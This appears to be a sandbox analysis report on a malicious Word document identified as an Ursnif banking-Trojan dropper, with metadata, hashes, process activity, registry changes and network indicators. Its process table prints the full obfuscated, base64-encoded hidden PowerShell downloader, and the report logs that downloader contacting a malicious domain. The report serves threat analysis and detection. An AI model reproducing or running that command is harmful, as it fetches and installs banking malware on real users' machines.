File name: | aaaa.doc |
Full analysis: | https://app.any.run/tasks/341f3db3-b9a8-418b-acaf-ec5b5c555180 |
Verdict: | Malicious activity |
Threats: | Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world. |
Analysis date: | February 11, 2019, 08:48:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 31083AEdafidop9714, Subject: 44488AEd10192, Author: 84862Akylaev51476, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 29 15:16:00 2018, Last Saved Time/Date: Tue May 29 15:16:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0 |
MD5: | 02F9BBEF7FA6BFAFB083CC81D71CEE25 |
SHA1: | F358E7367E6EE58C66B95D9E134254D5B64B624D |
SHA256: | 5FA990BD08BD0F5BF01F0D0616EFB68A7E71D2377C6F6783CDAB468678C13C74 |
SSDEEP: | 1536:PMFNiTwRh8Zc5n10GF/9vU2akCTdd2C+gcwDVBCc2CPpDV:EFNiTwAZc5nOU9cNH6CBDV |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
---|---|
CompObjUserTypeLen: | 32 |
Category: | 79831AEdafidop25112 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 9 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | 47602AEdafidop35478 |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 9 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2018:05:29 14:16:00 |
CreateDate: | 2018:05:29 14:16:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | 84862Akylaev51476 |
Subject: | 44488AEd10192 |
Title: | 31083AEdafidop9714 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\aaaa.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3836 | PowersHeLL -WinDowsTyle hidden -e IAAmACgAKAB2AGEAUgBpAEEAYgBsAEUAIAAnACoAbQBEAHIAKgAnACkALgBOAGEAbQBlAFsAMwAsADEAMQAsADIAXQAtAGoATwBpAE4AJwAnACkAIAAoACgAKAAoACIAewA0ADEAfQB7ADcAMwB9AHsANQAyAH0AewA2ADUAfQB7ADUANQB9AHsANAA3AH0AewA5ADMAfQB7ADUANwB9AHsAMwB9AHsAMgAyAH0AewAyADAAfQB7ADQAMAB9AHsANwA1AH0AewA2ADYAfQB7ADEAOAB9AHsAMgB9AHsANwAxAH0AewAxADEAfQB7ADYAOAB9AHsAOAAxAH0AewA5ADUAfQB7ADMAMQB9AHsANQAxAH0AewAzADgAfQB7ADIANgB9AHsAMgAzAH0AewAzADkAfQB7ADgANgB9AHsAOAA1AH0AewAxADMAfQB7ADEAMgB9AHsAMQA1AH0AewAzADcAfQB7ADgAOAB9AHsAOAAzAH0AewAxAH0AewA3ADcAfQB7ADEANAB9AHsANAA1AH0AewA4ADQAfQB7ADIANAB9AHsAMwAwAH0AewA0ADkAfQB7ADYANwB9AHsAMQA3AH0AewA1ADAAfQB7ADUAOAB9AHsANwA0AH0AewA3ADkAfQB7ADEAMAB9AHsAMQA2AH0AewA2ADkAfQB7ADcAfQB7ADUANAB9AHsAMgA4AH0AewAyADkAfQB7ADcAMAB9AHsAOQB9AHsAOAAyAH0AewA3ADIAfQB7ADIAMQB9AHsANgA0AH0AewA4ADcAfQB7ADQAfQB7ADQAOAB9AHsAOQAwAH0AewAzADUAfQB7ADYAfQB7ADkAMgB9AHsAOAAwAH0AewA4AH0AewA1AH0AewAwAH0AewA0ADMAfQB7ADIANQB9AHsANAA2AH0AewA3ADYAfQB7ADQAMgB9AHsAMgA3AH0AewAzADYAfQB7ADYAMQB9AHsAOQAxAH0AewA1ADMAfQB7ADkANAB9AHsANQA5AH0AewAzADMAfQB7ADQANAB9AHsANgAyAH0AewA4ADkAfQB7ADMAMgB9AHsAMQA5AH0AewA2ADMAfQB7ADkANgB9AHsANwA4AH0AewA2ADAAfQB7ADUANgB9AHsAMwA0AH0AIgAgAC0AZgAnAHIAcQAnACwAJwB0AHQAcAA6ACcALAAnAGIAVgBVAC0AbwBiACcALAAnAC4AKABiACcALAAnAFYAVQAnACwAJwB5AHsAUgAnACwAJwBjAGgAKABSAHIAcQBhAHMAZgBjACcALAAnACAAKwAgAGIAVgAnACwAJwBDAFgAKQB7AHQAcgAnACwAJwBSAHIAcQBOACcALAAnAHAAbABpAHQAKABiAFYAVQBAACcALAAnAGIAVgBVACkAJwAsACcAcgBxAEEAJwAsACcALAAgADIAOAAyADEAMwAzACkAOwBSACcALAAnAHcAJwAsACcARABDACcALAAnAGIAVgBVACkAOwBSAHIAcQBTACcALAAnAC4AcABoACcALAAnACsAJwAsACcAYgBWAFUAawBiAFYAVQArAGIAJwAsACcAbgBlAGIAVgBVACsAYgAnACwAJwBiAFYAVQAnACwAJwBWAFUAJwAsACcAYQBzAGQALgBuAGUAeAAnACwAJwBjACcALAAnAGIATABEAG8AMgBZADUAJwAsACcAYQBkACcALAAnAHIAJwAsACcAIAAnACwAJwArACcALAAnAG8AbQAvAEsAJwAsACcAYgBDAGwAaQBlAG4AdAA7AFIAcgBxAE4AUwBCACAAPQAnACwAJwBVACsAJwAsACcAKAAnACwAJwB0AGMAaAB7AH0AfQAnACwAJwByAGUAYQAnACwAJwBxACcALAAnAFgAJwAsACcAbgBzACcALAAnAHQAKAAxADAAJwAsACcAVgBVAHcAJwAsACcAUgByAHEAbgBzAGEAZABhAHMAZAAgAD0AIAAmACcALAAnAGUAVgBiAEwAKABSACcALAAnAFkAWQBVAC4AVgAnACwAJwApACwAIABSAHIAcQBTAEQAQwApADsAJwAsACcAZABxAHcAJwAsACcAVwBuAGwAMgBZADUATwAnACwAJwBkAG8AbQA7AFIAcgBxACcALAAnACkAOwAnACwAJwBPAFIALwAnACwAJwBwAD8AbAA9AGEAawAnACwAJwAgAFIAcgBxACcALAAnAFYAVQBlAGIAVgBVACsAYgBWAFUAdwAtAG8AYgAnACwAJwA1ACcALAAnAFUAYQBUAHAAYgBWAFUAJwAsACcAdABiAFYAVQApACAAcgBhAG4AJwAsACcAfQBjAGEAJwAsACcAPQAgACcALAAnAHUAcgA0AC4AeQBhAHIAbgBiAFYAJwAsACcAMgBZADUATgBnAFYAYgBMACcALAAnAG0AYgBWAFUAKQAoAFIAcgBxAFMARABDACkAOwBiAHIAZQBhAGsAOwAnACwAJwBhAHMAZgBjACcALAAnACYAKABiAFYAVQBJAG4AJwAsACcAVgBVAGUALQAnACwAJwArAGIAVgBVACcALAAnAGoAZQBjAGIAVgBVACsAYgBWAFUAJwAsACcAVQAnACwAJwB0AGUAcwB0AHYAJwAsACcAIABTAHkAcwAnACwAJwBEAEMAIAA9ACAAUgByAHEAZQBuAHYAOgBwAHUAYgBsAGkAYwAnACwAJwAgACcALAAnAGoAZQBjAHQAJwAsACcAVgBVAC4AZQB4ACcALAAnACgAYgBWAFUAbgBiAFYAVQArAGIAJwAsACcAVQAuACcALAAnAGIAVgAnACwAJwBhAGQARgBJADIAWQA1AGwAJwAsACcALwAvAGYAcQAnACwAJwB0AGUAJwAsACcAUwAnACwAJwByAHEAQQBEACcALAAnAHQAZQBtAC4ATgBlAHQAJwAsACcAUwBCACAAKwAgACgAYgAnACwAJwBVAA0ACgBoACcALAAnADQAZAA0AC4AJwAsACcAMAAwACcALAAnADAAJwAsACcAZQBiACcALAAnACAAPQAgAGIAVgAnACwAJwB2AG8AYgBWACcALAAnAGYAbwAnACwAJwAuAFYAYgBMAFQAbwBTAHQAcgAyAFkAJwAsACcAIABpAG4AIABSACcALAAnAFkAWQBVACAAJwAsACcAaQAnACwAJwAuAFcAZQAnACwAJwBJACcAKQApAC0AQwBSAGUAUABMAGEAQwBlACAAKABbAEMASABBAFIAXQA4ADIAKwBbAEMASABBAFIAXQAxADEANAArAFsAQwBIAEEAUgBdADEAMQAzACkALABbAEMASABBAFIAXQAzADYALQBDAFIAZQBQAEwAYQBDAGUAIAAnADIAWQA1ACcALABbAEMASABBAFIAXQA5ADYALQByAEUAcABMAGEAYwBFACcAYgBWAFUAJwAsAFsAQwBIAEEAUgBdADMAOQAgAC0AQwBSAGUAUABMAGEAQwBlACAAJwBhAFQAcAAnACwAWwBDAEgAQQBSAF0AOQAyACAALQBDAFIAZQBQAEwAYQBDAGUAIAAnAFYAYgBMACcALABbAEMASABBAFIAXQAzADQAKQApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | ||/ |
Value: 7C7C2F00900B0000010000000000000000000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1313538069 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313538188 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313538189 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 900B000058A5FDA3E6C1D40100000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | $~/ |
Value: 247E2F00900B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | $~/ |
Value: 247E2F00900B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR68DC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3836 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UUZVRT8Q6PVXHOE8BK9H.temp | — | |
MD5:— | SHA256:— | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C569802DB5849779F22174B9AB0F135F | SHA256:6C3CAD88468FE63910B07989B21F7D4FABE3C3BD098CFFAF6E32CA3A869558B7 | |||
3836 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3836 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2471a6.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$aaaa.doc | pgc | |
MD5:8E11931B415CA290BC0D52E97296258B | SHA256:F56939F81D74976166F44AAF7FB012732D3F8AF5F437EFB340FA9971B44A91E9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3836 | PowersHeLL.exe | GET | — | 23.82.167.134:80 | http://fqwdqw4d4.com/KOR/testv.php?l=akur4.yarn | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3836 | PowersHeLL.exe | 23.82.167.134:80 | fqwdqw4d4.com | Nobis Technology Group, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
fqwdqw4d4.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3836 | PowersHeLL.exe | A Network Trojan was detected | MALWARE [PTsecurity] Possible Powershell Downloader (Ursnif) |